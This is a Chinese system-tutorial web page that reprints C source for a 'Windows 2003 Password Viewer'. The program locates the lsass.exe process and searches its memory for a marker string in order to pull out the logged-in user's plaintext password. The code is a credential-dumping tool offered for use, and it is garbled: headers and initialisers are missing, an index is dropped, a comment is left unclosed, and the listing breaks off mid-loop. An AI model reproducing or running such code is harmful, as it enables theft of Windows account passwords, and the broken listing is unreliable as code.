当前位置：万象系统之家 > 系统教程 > 在win 2003中得到登陆用户的密码的三大妙法(2)

在win 2003中得到登陆用户的密码的三大妙法(2)

时间：2012-10-29 14:30:41 作者：木木来源：万象系统之家 1. 扫描二维码随时看资讯 2. 请使用手机浏览器访问： https://m.xitongzhijia.net/xtjc/20121029/17921.html 手机查看评论反馈

　　代码: //********************************************************************************

　　// Version: V1.0

　　// Coder: WinEggDrop

　　// Date Release: 12/15/2004

　　// Purpose: To Demonstrate Searching Logon User Password On 2003 Box，The Method

　　// Used Is Pretty Unwise，But This May Be The Only Way To Review The

　　// Logon User's Password On windows 2003.

　　// Test PlatForm: windows 2003

　　// Compiled On: VC++ 6.0

　　//********************************************************************************

　　#include

　　#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address，Which Causes The Result Unreliable

　　char Password[MAX_PATH] = ; // Store The Found Password

　　// Function ProtoType Declaration

　　//------------------------------------------------------------------------------------------------------

　　BOOL FindPassword(DWORD PID);

　　int Search(char *Buffer，const UINT nSize);

　　DWORD GetLsassPID();

　　BOOL Is2003();

　　//------------------------------------------------------------------------------------------------------

　　// End Of Fucntion ProtoType Declaration

　　int main()

　　{

　　DWORD PID = 0;

　　printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

　　if (!Is2003()) // Check Out If The Box Is 2003

　　{

　　printf("The Program Can't Only Run On windows 2003 Platform\n");

　　return -1;

　　}

　　PID = GetLsassPID(); // Get The Lsass.exe PID

　　if (PID == 0) // Fail To Get PID If Returning Zerom

　　{

　　return -1;

　　}

　　FindPassword(PID); // Find The Password From Lsass.exe Memory

　　return 0;

　　}

　　// End main()

　　//------------------------------------------------------------------------------------

　　// Purpose: Search The Memory & Try To Get The Password

　　// Return Type: int

　　// Parameters:

　　// In: char *Buffer --> The Memory Buffer To Search

　　// Out: const UINT nSize --> The Size Of The Memory Buffer

　　// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"，

　　// Since The Password Is Near The Above Location，But It's Not Always True That

　　// We Will Find The Magic String，Or Even We Find It，The Password May Be Located

　　// At Some Other Place.We Only Look For Luck

　　//------------------------------------------------------------------------------------

　　int Search(char *Buffer，const UINT nSize)

　　{

　　UINT OffSet = 0;

　　UINT i = 0;

　　UINT j = 0 ;

　　UINT Count = 0;

　　if (Buffer == NULL)

　　{

　　return -1;

　　}

　　for (i = 0 ; i < nSize ; i++)

　　{

　　/* The Below Is To Find The Magic String，Why So Complicated?That Will Thank MS.The Separation From Word To Word

　　Is Not Separated With A Space，But With A Ending Character，So Any Search API Like strstr() Will Fail To Locate

　　The Magic String，We Have To Do It Manually And Slowly

　　if (Buffer == 'L')

　　{

　　OffSet = 0;

　　if (strnicmp(&Buffer[i + OffSet]，"LocalSystem"，strlen("LocalSystem")) == 0)

　　{

　　OffSet += strlen("LocalSystem") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Remote"，strlen("Remote")) == 0)

　　{

　　OffSet += strlen("Remote") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Procedure"，strlen("Procedure")) == 0)

　　{

　　OffSet += strlen("Procedure") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Call"，strlen("Call")) == 0)

　　{

　　i += OffSet;

　　break;

　　}

　　if (i < nSize)

　　{

　　ZeroMemory(Password，sizeof(Password));

　　for (; i < nSize ; i++)

标签 win 2003 登陆用户密码得到密码妙法

发表评论

共0条

验证码

没有更多评论了

评论就这些咯，让大家也知道你的独特见解

立即评论

以上留言仅代表用户个人观点，不代表万象系统之家立场

在win 2003中得到登陆用户的密码的三大妙法(2)

相关教程

发表评论

其他版本软件

热门教程

人气教程排行

服务器系统推荐

猜你想搜